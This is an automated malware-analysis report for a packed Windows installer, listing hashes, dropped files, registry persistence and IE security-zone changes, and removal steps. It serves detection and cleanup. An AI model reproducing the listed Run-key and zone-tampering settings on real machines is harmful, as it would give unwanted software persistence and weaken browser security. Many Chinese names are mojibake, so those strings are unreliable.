mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Malware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 002f865ab6cd2f05ca23808cbb09ebe3
SHA1: f8884bd41e88bfbe8c233259bba0b144453284f1
SHA256: 015f9407073db73916086c6cf68eb3e02a90dcded9db98f24ede64cf4345958d
SSDeep: 12288:Fla8UjwZQHW1F/K6fBEtdK7WGCMnA0xfpfx1k:Fl2w HspEvK7WGCwAup51k
Size: 595291 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-06-19 00:33:27
Analyzed on: WindowsXP SP3 32-bit
Summary: Malware. Malware, short for malicious software, is any software used to disrupt computer operation, gather sensitive information, or gain access to private computer systems.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Malware creates the following process(es):
install.exe:432
CreateShortcut.exe:1284
%original file name%.exe:772
KS1426.exe:2000
ksimekusu_zhim_007.exe:1896
OneDay.exe:604
The Malware injects its code into the following process(es):No processes have been created.
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process CreateShortcut.exe:1284 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%Program Files%\Favorite\ico\ay.ico (784 bytes)
%Documents and Settings%\%current user%\Desktop\Ó°ÊÓ´óÈ«.lnk (1 bytes)
%Program Files%\Favorite\ico\123.ico (3 bytes)
%Program Files%\Favorite\ico\360.ico (784 bytes)
%Documents and Settings%\%current user%\Desktop\Ëѹ·ÃÂÂøÖ·µ¼º½.lnk (1 bytes)
%Program Files%\Favorite\ico\tb1.ico (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb5.tmp (13218 bytes)
%Documents and Settings%\%current user%\Desktop\hao123ÃÂÂøÖ·µ¼º½.lnk (1 bytes)
%Program Files%\Favorite\ico\sg1.ico (9 bytes)
%Documents and Settings%\%current user%\Desktop\Internet Explroer.lnk (1 bytes)
%Documents and Settings%\%current user%\Desktop\360ÃÂÂøÖ·µ¼º½.lnk (1 bytes)
%Documents and Settings%\%current user%\Desktop\°®ÌÃâ€Â±¦.lnk (1 bytes)
%Program Files%\Favorite\ico\movie.ico (12536 bytes)
%Program Files%\Favorite\ico\ie.ico (784 bytes)
%Program Files%\Favorite\ico\23451.ico (9 bytes)
The Malware deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsb6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl4.tmp (0 bytes)
The process %original file name%.exe:772 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\-2203_1_mp.exe (269650 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\CreateShortcut.exe (9276 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\ksimekusu_zhim_007.exe (230865 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\Furt.exe (16944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\apps.txt (1457 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp (20725 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\OneDay.exe (108876 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\NSISdl.dll (14 bytes)
The Malware deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nso1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp (0 bytes)
The process ksimekusu_zhim_007.exe:1896 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%Program Files%\KS2015011116\V1426\msvcr100.dll (25824 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\ÖÃÂÂÎÄÖ®ÃÂÂÇË«Æ´.ini (526 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\wordlib\sys.wlb (39329 bytes)
%Program Files%\KS2015011116\V1426\imeunit.exe (4992 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÃÂÂÖ÷Ìâ\bg_main.png (4 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÃÂÂÖ÷Ìâ\bg_status.png (4 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\Ìáʾ.ini (960 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\¿ìËÙÆ´ÒôÊäÈë·¨\ÉèÖÃ.lnk (812 bytes)
%Program Files%\KS2015011116\V1426\atl100.dll (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy9.tmp\nsis.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi8.tmp (285959 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\zi\hzjf.dat (784 bytes)
%Program Files%\KS2015011116\V1426\install.exe (1856 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\À¶ÌìË«Æ´.ini (912 bytes)
%Documents and Settings%\%current user%\Application Data\kusuInput\phrase\ÎҵĶÌÓï.ini (24 bytes)
%Program Files%\KS2015011116\V1426\imeword.exe (4992 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\Æ´Òô¼Ó¼ÓË«Æ´.ini (538 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy9.tmp\KillProcDLL.dll (4 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÃÂÂÖ÷Ìâ\theme.ini (2 bytes)
%Program Files%\KS2015011116\V1426\msvcp100.dll (14184 bytes)
%Program Files%\KS2015011116\V1426\uninst.exe (838 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeSkin.dll (1552 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÃÂÂÖ÷Ìâ\buttons.png (5 bytes)
%Program Files%\KS2015011116\V1426\DirectUI.dll (22192 bytes)
%Program Files%\KS2015011116\V1426\Library.dll (5064 bytes)
%Program Files%\KS2015011116\V1426\sqlite3.dll (22192 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\ÖÃÂÂÎÄ·ûºÅ.ini (560 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\¹Ì¶¥Ãâ€â€ÃƒÆ’–.ini (6 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\Ë«Æ´.ini (1 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeTool.dll (2392 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\zi\j2f.dat (11048 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\ÖÇÄÜABCË«Æ´.ini (686 bytes)
%Program Files%\KS2015011116\V1426\imetool.exe (6360 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\plugin.db (2 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeMini.dll (5064 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\DOSË«Æ´.ini (674 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\¿ìËÙÆ´ÒôÊäÈë·¨\ÃÂÂÞ¸´.lnk (825 bytes)
%Program Files%\KS2015011116\V1426\config.exe (11344 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\menu_buttons.bmp (920 bytes)
%Documents and Settings%\%current user%\Application Data\kusuInput\wordlib\user.wlb (3 bytes)
%Program Files%\KS2015011116\V1426\KS1426.exe (7192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy9.tmp\System.dll (11 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\¿ìËÙÆ´ÒôÊäÈë·¨\öÃâ€ÂØ.lnk (613 bytes)
%System%\ksime.ime (126018 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\΢ÈÃÂÂË«Æ´.ini (682 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\phrase\õó¶ÌÓï¿â.ini (784 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\Ãâ€â€ÃƒÆ’â€ÂÈ»ÂëË«Æ´.ini (580 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\zi\hzpy.dat (18424 bytes)
%Program Files%\KS2015011116\V1426\nsis.dll (3616 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeWord.dll (1552 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÃÂÂÖ÷Ìâ\line.png (143 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeUnit.dll (2392 bytes)
The Malware deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsy9.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy9.tmp\KillProcDLL.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy9.tmp\nsis.dll (0 bytes)
The process OneDay.exe:604 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\FNHI9HC7\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1G36EQJN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\20DNL7ZC\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\VBTRRG9A\desktop.ini (67 bytes)
Registry activity
The process install.exe:432 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Control\Keyboard Layouts\E0200804]
"Ime File" = "KSIME.IME"
"Layout File" = "kbdus.dll"
[HKU\.DEFAULT\Keyboard Layout\Preload]
"2" = "E0200804"
[HKCU\Software\JisuSoft\KusuInput\3.0]
"Layout" = "E0200804"
[HKCU\Keyboard Layout\Preload]
"2" = "E0200804"
[HKLM\System\CurrentControlSet\Control\Keyboard Layouts\E0200804]
"Layout Text" = "快速拼音输入法"
The process CreateShortcut.exe:1284 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D8 85 2E 8A 86 6A D3 5B 60 0F 67 73 E0 9A F5 78"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
The process %original file name%.exe:772 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "98 C4 E6 03 D2 AC 58 0C E4 5E 45 06 D5 29 06 49"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process KS1426.exe:2000 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "68 95 C7 8D 1B 13 6F DE E5 23 8F 93 9A 07 1C 8E"
[HKCU\Software\JisuSoft\KusuInput\3.0]
"Config" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
"Count" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\JisuSoft\KusuInput\3.0]
"CRand" = "433"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
The process ksimekusu_zhim_007.exe:1896 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKCU\Software\JisuSoft\KusuInput\3.0]
"Qudao" = "ksimekusu_zhim_007"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy9.tmp\nsis.dll,"
[HKCU\Software\JisuSoft\KusuInput\3.0]
"Count" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCU\Software\JisuSoft\KusuInput\3.0]
"Proc" = "KS1426.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\¿ìËÙÆ´ÒôÊäÈë·¨]
"DisplayIcon" = "%Program Files%\KS2015011116\V1426\KS1426.exe"
[HKCR\JiSu.file\DefaultIcon]
"(Default)" = "%Program Files%\KS2015011116\V1426\config.exe,0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1A 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\¿ìËÙÆ´ÒôÊäÈë·¨]
"UninstallString" = "%Program Files%\KS2015011116\V1426\uninst.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\JisuSoft\KusuInput\3.0]
"date" = "20150111"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\¿ìËÙÆ´ÒôÊäÈë·¨]
"DisplayName" = "¿ìËÙÆ´ÒôÊäÈë·¨ 3.0.3.9"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCR\JiSu.file\shell\open\command]
"(Default)" = "%Program Files%\KS2015011116\V1426\config.exe %1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCR\.wlb]
"(Default)" = "JiSu.file"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\¿ìËÙÆ´ÒôÊäÈë·¨]
"Publisher" = "cxmx, Inc."
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCR\JiSu.file\shell\open]
"(Default)" = "°²Ãâ€â€Ãƒâ€šÃ‚°Ãƒâ€â€ÃƒÆ’–¿â"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\¿ìËÙÆ´ÒôÊäÈë·¨]
"DisplayVersion" = "3.0.3.9"
[HKCU\Software\JisuSoft\KusuInput\3.0]
"InstallDir" = "%Program Files%\KS2015011116\V1426"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\¿ìËÙÆ´ÒôÊäÈë·¨]
"URLInfoAbout" = "http://jiguangshurufa.com/"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "56 28 FE 77 6C CB 17 F1 B2 9E 76 A7 C5 65 8D BA"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCR\JiSu.file]
"(Default)" = "Ãâ€â€ÃƒÆ’–¿âÎļþ (.wlb)"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\ksinput.exe]
"(Default)" = "%Program Files%\KS2015011116\V1426\KS1426.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\JiSu.file\shell]
"(Default)" = "open"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\JisuSoft\KusuInput\3.0]
"Entry" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Malware modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Malware modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
To automatically run itself each time Windows is booted, the Malware adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"KS1426.exe" = "%Program Files%\KS2015011116\V1426\KS1426.exe"
The Malware modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
To automatically run itself each time Windows is booted, the Malware adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"KS1426.exe" = "%Program Files%\KS2015011116\V1426\KS1426.exe"
The Malware deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process OneDay.exe:604 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BA CD 70 C1 06 21 03 54 44 44 C9 F0 FD 65 86 A3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."
Dropped PE files
| MD5 | File path |
|---|---|
| 6db1aab5dd1729e9045917fcc5c7a9bd | c:\Documents and Settings\All Users\Application Data\kusuInput\plugin\ImeMini.dll |
| e96186aaa638e2968eed3361f61ab0d5 | c:\Documents and Settings\All Users\Application Data\kusuInput\plugin\ImeSkin.dll |
| 1d56753feda1d359317f39cd2926776d | c:\Documents and Settings\All Users\Application Data\kusuInput\plugin\ImeTool.dll |
| 56c833a0a45ebc14e2bf0230fe8c4678 | c:\Documents and Settings\All Users\Application Data\kusuInput\plugin\ImeUnit.dll |
| 293fe7132d2b950a6c4ee85b0f06a3ce | c:\Documents and Settings\All Users\Application Data\kusuInput\plugin\ImeWord.dll |
| 9ec7343e965f1f5da63daa34515be40e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst3.tmp\CreateShortcut.exe |
| 678e0ebb76fd1af1fce5ac082d682f94 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst3.tmp\Furt.exe |
| 254f13dfd61c5b7d2119eb2550491e1d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst3.tmp\NSISdl.dll |
| d2acd1407a3d27c309ce750b97e13d77 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst3.tmp\OneDay.exe |
| 144bd6f3a3e1e040ffb03648e49c366d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst3.tmp\ksimekusu_zhim_007.exe |
| bacbca35f6b7e759fff3c6321f6f1b2a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsy9.tmp\nsis.dll |
| 0e40d4a64f7f3637b3efb0ecbe645a6c | c:\Program Files\KS2015011116\V1426\DirectUI.dll |
| 2ac6987d52efc4e43955da4f3fb855e8 | c:\Program Files\KS2015011116\V1426\KS1426.exe |
| ad42f2f8f08c085a04f2fd0d6b472176 | c:\Program Files\KS2015011116\V1426\Library.dll |
| 36d7d05505951f542922df4c725cc57d | c:\Program Files\KS2015011116\V1426\atl100.dll |
| bea1a8d84f1d871c237b5634a7819047 | c:\Program Files\KS2015011116\V1426\config.exe |
| 1302954a19e63cb334c3e6a423caea0c | c:\Program Files\KS2015011116\V1426\imetool.exe |
| ad41cb4c1277817b46d75f1af6aee58e | c:\Program Files\KS2015011116\V1426\imeunit.exe |
| 5d5609e55fefeff66ea45e524b422d56 | c:\Program Files\KS2015011116\V1426\imeword.exe |
| 9389d5662768d7abc078aecf51deada7 | c:\Program Files\KS2015011116\V1426\install.exe |
| 03e9314004f504a14a61c3d364b62f66 | c:\Program Files\KS2015011116\V1426\msvcp100.dll |
| 67ec459e42d3081dd8fd34356f7cafc1 | c:\Program Files\KS2015011116\V1426\msvcr100.dll |
| bacbca35f6b7e759fff3c6321f6f1b2a | c:\Program Files\KS2015011116\V1426\nsis.dll |
| ee68b052a08fec0f574f2dae2003df27 | c:\Program Files\KS2015011116\V1426\sqlite3.dll |
| 6dec6339ba7414dbee3b372ab94115a8 | c:\Program Files\KS2015011116\V1426\uninst.exe |
| 1cc5717f5e506daeb628506f10954788 | c:\WINDOWS\system32\ksime.ime |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
install.exe:432
CreateShortcut.exe:1284
%original file name%.exe:772
KS1426.exe:2000
ksimekusu_zhim_007.exe:1896
OneDay.exe:604 - Delete the original Malware file.
- Delete or disinfect the following files created/modified by the Malware:
%Program Files%\Favorite\ico\ay.ico (784 bytes)
%Documents and Settings%\%current user%\Desktop\Ó°ÊÓ´óÈ«.lnk (1 bytes)
%Program Files%\Favorite\ico\123.ico (3 bytes)
%Program Files%\Favorite\ico\360.ico (784 bytes)
%Documents and Settings%\%current user%\Desktop\Ëѹ·ÃÂÂøÖ·µ¼º½.lnk (1 bytes)
%Program Files%\Favorite\ico\tb1.ico (15 bytes)
